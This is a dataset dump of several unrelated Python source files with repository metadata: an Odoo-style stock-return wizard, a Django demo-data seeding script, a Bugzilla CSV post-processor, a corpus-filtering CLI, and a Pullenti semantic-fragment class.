| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,299
|
py
|
# -*- coding: utf-8 -*-
# Part of Harpiya. See LICENSE file for full copyright and licensing details.
from harpiya import api, fields, models
class StockReturnPicking(models.TransientModel):
    """Return-picking wizard extension: defaults new lines to refund and
    propagates the to_refund flag onto the created return moves."""
    _inherit = "stock.return.picking"
    @api.model
    def default_get(self, default_fields):
        """Default every proposed return line's to_refund flag to True."""
        res = super(StockReturnPicking, self).default_get(default_fields)
        # product_return_moves holds one2many command triples; presumably
        # (0, 0, vals) creation commands whose third element is the field
        # dict we extend -- TODO confirm against the base wizard.
        for i, k, vals in res.get('product_return_moves', []):
            vals.update({'to_refund': True})
        return res
    def _create_returns(self):
        """Create the return picking, then mark its moves to_refund where the
        matching wizard line requested it."""
        new_picking_id, pick_type_id = super(StockReturnPicking, self)._create_returns()
        new_picking = self.env['stock.picking'].browse([new_picking_id])
        for move in new_picking.move_lines:
            # Match each new move back to the wizard line that produced it.
            return_picking_line = self.product_return_moves.filtered(lambda r: r.move_id == move.origin_returned_move_id)
            if return_picking_line and return_picking_line.to_refund:
                move.to_refund = True
        return new_picking_id, pick_type_id
class StockReturnPickingLine(models.TransientModel):
    _inherit = "stock.return.picking.line"

    # Whether validating the return should also decrease the delivered /
    # received quantity on the linked Sale/Purchase order line.
    to_refund = fields.Boolean(string="Update quantities on SO/PO", default=True,
        help='Trigger a decrease of the delivered/received quantity in the associated Sale Order/Purchase Order')
|
[
"yasir@harpiya.com"
] |
yasir@harpiya.com
|
d09dcfed132ff4011c66f4e8bb3b98eb78faa0c3
|
70bc23c82cd64cd0c8184eb3388b269c0b16b7f3
|
/create_scripts.py
|
92b6b811b17d245ac846bb33229c1a9612a6bb15
|
[] |
no_license
|
Liang60711/django-portfolio_1
|
bdb2d759412611ca7e3d303807facc2df59708c2
|
97f0e45674c1a52c4c125704f820ff6d89e29f1f
|
refs/heads/main
| 2023-03-09T16:15:41.166194
| 2021-03-01T19:19:30
| 2021-03-01T19:19:30
| 325,354,166
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,121
|
py
|
import os
import django

# Django must be configured before any model import.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ecommerce.settings')
django.setup()

from core.models import Item
import random
from django.core.files import File
from django.conf import settings

# Choice tuples mirror the definitions on the core models.
CATEGORY_CHOICES = (
    ('S', 'Shirt'),
    ('SW', 'Sport wear'),
    ('OW', 'Outwear'),
)
LABEL_CHOICES = (
    ('P', 'primary'),
    ('S', 'secondary'),
    ('D', 'danger'),
)
ADDRESS_CHOICES = (
    ('B', 'Billing'),
    ('S', 'Shipping'),
)

# Rebuild the demo catalogue from scratch.
Item.objects.all().delete()

# `with` closes the handle (the original leaked it), and seek(0) rewinds
# the stream before every save so each Item stores the full image instead
# of an exhausted file object.
with open(os.path.join(settings.BASE_DIR, 'media', '5.jpg'), 'rb') as img:
    f = File(img)
    for i in range(12):
        f.seek(0)
        Item.objects.create(
            title='Item '+str(i),
            price=random.randint(1, 9)*100,
            # random.choice picks one tuple directly; the original's
            # random.choices(...)[0] built a one-element list for the same.
            category=random.choice(CATEGORY_CHOICES)[0],
            label=random.choice(LABEL_CHOICES)[0],
            description='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec pretium ante erat, vitae sodales mi varius quis. Etiam vestibulum lorem vel urna tempor, eu fermentum odio aliquam. Aliquam consequat urna vitae ipsum pulvinar, in blandit purus eleifend.',
            slug=str(i),
            image=f,
        )
|
[
"liang60711@gmail.com"
] |
liang60711@gmail.com
|
ac308bc1954de48099c8abcf8f1054f3fd988cec
|
788e789808e56fc53571a62e34a0c104f6641e64
|
/analysisCSV.py
|
8c3ab71221af8c676bb000766d292060ad1aa6fb
|
[] |
no_license
|
maxiaohui0921/BugzilaReport
|
a6922ff7f88168eb0641aa497d0c2b6b6021a423
|
bc8804b06d01c2e3e4430323813ea27b7c8488fa
|
refs/heads/master
| 2020-03-14T20:37:50.238905
| 2018-05-02T00:52:08
| 2018-05-02T00:52:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,016
|
py
|
#2018/02/24 MaXiaohui
import csv
import downloadCSV
import glConstant
import bugTable
# Write department, status, devFix date and verifyClose date into the CSV.
queryLink="OrangeFPandPatch"
# NOTE(review): `csvFile` is only assigned in the commented-out lines below,
# so the `analysisCSV(csvFile)` call in the __main__ guard raises NameError.
#csvFile=downloadCSV.downloadCSV(glConstant.bugURL,queryLink)
#csvFile=r"C:\Users\maxh\Desktop\Buglist\源文件\OrangeFPandPatch201802011021.csv"
def arrayAdd(list1,list2):
    """Append every element of list2 to list1 in place.

    Mutates list1 and returns None, matching the original contract.
    Kept as a named helper for readability at the call sites.
    """
    # list.extend is the idiomatic, C-speed equivalent of the original
    # manual `for i in range(len(list2)): list1.append(list2[i])` loop.
    list1.extend(list2)
def analysisCSV(csvFile):
    """Post-process a Bugzilla CSV export in place.

    Reads csvFile (UTF-8), appends four derived columns to every row
    (BugFix date, BugReopen date, status category, owner department)
    and rewrites the file.

    NOTE(review): column indexes (3=status, 6=fix date, 7=owner,
    9=reopen date) assume the layout produced by the configured query —
    confirm if the query columns change.
    """
    # Read the whole export into memory; `with` closes the handle
    # (the original leaked an open file object).
    with open(csvFile, encoding="utf-8") as fi:
        data = [line for line in csv.reader(fi)]
    # Append the new derived columns to the header row.
    headers = ["BugFix日期", "BugReopen日期", "状态分类", "负责人部门"]
    arrayAdd(data[0], headers)
    for i in range(1, len(data)):
        # Strip the trailing time portion (last 9 chars) from both dates.
        data[i][6] = data[i][6][:-9]
        data[i][9] = data[i][9][:-9]
        if data[i][3] in glConstant.closeStatus:
            tableDatelist = [data[i][6], "", "Closed"]
            arrayAdd(data[i], tableDatelist)
        else:
            arrayAdd(data[i], ["", ""])
        if data[i][3] in glConstant.openStatus:
            tag = "无相关部门"
            arrayAdd(data[i], ["Open"])
            # Use a local loop variable: the original wrote
            # `for k, glConstant.v in ...`, accidentally rebinding an
            # attribute on the glConstant module every iteration.
            for k, members in glConstant.team.items():
                if data[i][7] in members:
                    arrayAdd(data[i], [k])
                    tag = "有相关部门"
            if tag == "无相关部门":
                print(data[i][7]+"为新员工,未加入部门中,请更新配置文件中的组成员列表")
        if data[i][3] == "已解决 (RESOLVED)":
            arrayAdd(data[i], ["Resolved"])
    # newline="" prevents the blank rows csv.writer otherwise produces on
    # Windows; utf-8 matches the read side (original used the locale
    # default and never closed the handle, risking truncated output).
    with open(csvFile, "w", encoding="utf-8", newline="") as fo:
        csv.writer(fo).writerows(data)
if __name__=="__main__":
    # The original called analysisCSV(csvFile) with `csvFile` undefined
    # (its assignments are commented out above), crashing with NameError.
    # Accept the CSV path on the command line, falling back to downloading
    # the query result as the commented-out code intended.
    import sys
    if len(sys.argv) > 1:
        csvFile = sys.argv[1]
    else:
        csvFile = downloadCSV.downloadCSV(glConstant.bugURL, queryLink)
    analysisCSV(csvFile)
|
[
"38674823+maxiaohui0921@users.noreply.github.com"
] |
38674823+maxiaohui0921@users.noreply.github.com
|
f9ae3dfa9e5cae2982f31a833e426773e239ed40
|
e77732bce61e7e97bad5cee1b07d1b5f9b6fa590
|
/cat/utils/data/exclude_corpus.py
|
08cc3af28cfc90a11efade2a6bdf4941e1369fb7
|
[
"Apache-2.0"
] |
permissive
|
entn-at/CAT
|
9f28f5ff75b37ac90baf63609226deb99d73dbe2
|
fc74841e8f6b7eb2f2f88bb7c09b30ad5a8c16f4
|
refs/heads/master
| 2023-04-10T13:32:31.333889
| 2023-02-27T16:50:43
| 2023-02-27T17:29:07
| 236,718,892
| 0
| 0
| null | 2020-01-28T11:24:01
| 2020-01-28T11:24:00
| null |
UTF-8
|
Python
| false
| false
| 2,432
|
py
|
# Author: Huahuan Zheng (maxwellzh@outlook.com)
#
# Fetch n lines from source corpus and exclude part of the source if needed.
#
import sys
import os
import argparse
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("corpus", type=str,
                        help="Path to the source text corpus.")
    parser.add_argument("--exclude-corpus", type=str, dest="f_exc",
                        help="Add this option if you want to exclude it from source corpus, take first column as index.")
    parser.add_argument("-n", "--num-lines", type=int,
                        help="Number of lines to be prepared, if not specified, would take all of them (after excluded).")
    args = parser.parse_args()

    def _uid_of(line: str) -> str:
        """Return the first whitespace-delimited column (the utterance id).

        A line with no whitespace is treated as a bare id.  Shared by the
        exclusion-list reader and the main filter loop (was duplicated).
        """
        if ' ' in line or '\t' in line:
            return line.split(maxsplit=1)[0]
        return line

    if not os.path.isfile(args.corpus):
        raise FileNotFoundError(f"--corpus={args.corpus} is not a valid file.")
    if args.f_exc is not None and not os.path.isfile(args.f_exc):
        raise FileNotFoundError(
            f"--exclude-corpus={args.f_exc} is not a valid file.")

    if args.num_lines is not None:
        if args.num_lines < 0:
            # (fixed typo in the message: "valud" -> "value")
            raise ValueError(
                f"--num-lines={args.num_lines} < 0 is invalid, expected value >= 0")
        num_lines = args.num_lines
    else:
        # Default: export everything that survives the exclusion filter.
        # `with` closes the handle (the original leaked it here).
        with open(args.corpus, 'r') as fi:
            num_lines = sum(1 for _ in fi)

    # Build the set of utterance ids to skip.
    excluding_list = set()
    if args.f_exc is not None:
        with open(args.f_exc, 'r') as fi:
            for line in fi:
                excluding_list.add(_uid_of(line.strip()))

    cnt = 0
    with open(args.corpus, 'r') as fi:
        try:
            for line in fi:
                line = line.strip()
                if _uid_of(line) in excluding_list:
                    continue
                if cnt >= num_lines:
                    break
                sys.stdout.write(f"{line}\n")
                cnt += 1
        except IOError:
            # Downstream pipe closed early (e.g. `| head`): stop quietly.
            sys.exit(0)

    if cnt < num_lines and args.num_lines is not None:
        raise RuntimeError(
            f"Source corpus text doesn't have enough unique lines to export: {cnt} in total, expect {num_lines}")
|
[
"maxwellzh@outlook.com"
] |
maxwellzh@outlook.com
|
be868d1d34aa3dad1df6b4c850a30a4565685c4c
|
e22390ec9aa1a842626075113472f81076e1bf5f
|
/pullenti/semantic/SemFragment.py
|
3954b163c1693d239274475b64e5e3f1cd4930fb
|
[] |
no_license
|
pullenti/PullentiPython
|
ba9f450f3f49786732e80f34d0506d4a6d41afc3
|
815d550b99f113034c27f60d97493ce2f8e4cfcc
|
refs/heads/master
| 2021-06-22T17:12:36.771479
| 2020-12-11T06:10:23
| 2020-12-11T06:10:23
| 161,268,453
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,299
|
py
|
# Copyright (c) 2013, Pullenti. All rights reserved.
# Non-Commercial Freeware and Commercial Software.
# This class is generated using the converter UniSharping (www.unisharping.ru) from Pullenti C#.NET project.
# The latest version of the code is available on the site www.pullenti.ru
import typing
from pullenti.unisharp.Utils import Utils
from pullenti.ner.core.GetTextAttr import GetTextAttr
from pullenti.ner.core.MiscHelper import MiscHelper
from pullenti.semantic.ISemContainer import ISemContainer
from pullenti.semantic.SemGraph import SemGraph
from pullenti.semantic.SemFragmentType import SemFragmentType
from pullenti.semantic.SemObjectType import SemObjectType
class SemFragment(ISemContainer):
    """A fragment of a block (a sentence)."""

    def __init__(self, blk : 'SemBlock') -> None:
        self.__m_graph = SemGraph()
        self.typ = SemFragmentType.UNDEFINED
        self.is_or = False
        self.begin_token = None
        self.end_token = None
        self.tag = None
        self.m_higher = blk

    @property
    def graph(self) -> 'SemGraph':
        """Objects of this fragment (note: some objects related to this
        block may live in graphs at higher levels)."""
        return self.__m_graph

    @property
    def higher(self) -> 'ISemContainer':
        return self.m_higher

    @property
    def block(self) -> 'SemBlock':
        """The block that owns this fragment."""
        return self.m_higher

    @property
    def root_objects(self) -> typing.List['SemObject']:
        """SemObjects with no incoming links; in a clean parse there is
        normally exactly one — the predicate."""
        return [obj for obj in self.__m_graph.objects if len(obj.links_to) == 0]

    @property
    def can_be_error_structure(self) -> bool:
        # More than one link-free root, and at least one non-verb among
        # them, suggests a structurally suspect parse.
        roots = [obj for obj in self.__m_graph.objects if len(obj.links_to) == 0]
        if len(roots) <= 1:
            return False
        verb_roots = sum(1 for obj in roots if obj.typ == SemObjectType.VERB)
        return verb_roots < len(roots)

    @property
    def spelling(self) -> str:
        """Plain text of the fragment."""
        return MiscHelper.get_text_value(self.begin_token, self.end_token, GetTextAttr.KEEPREGISTER)

    @property
    def begin_char(self) -> int:
        if self.begin_token is None:
            return 0
        return self.begin_token.begin_char

    @property
    def end_char(self) -> int:
        if self.end_token is None:
            return 0
        return self.end_token.end_char

    def __str__(self) -> str:
        text = Utils.ifNotNull(self.spelling, "?")
        if self.typ == SemFragmentType.UNDEFINED:
            return text
        return "{0}: {1}".format(Utils.enumToString(self.typ), text)
|
[
"alex@alexkuk.ru"
] |
alex@alexkuk.ru
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.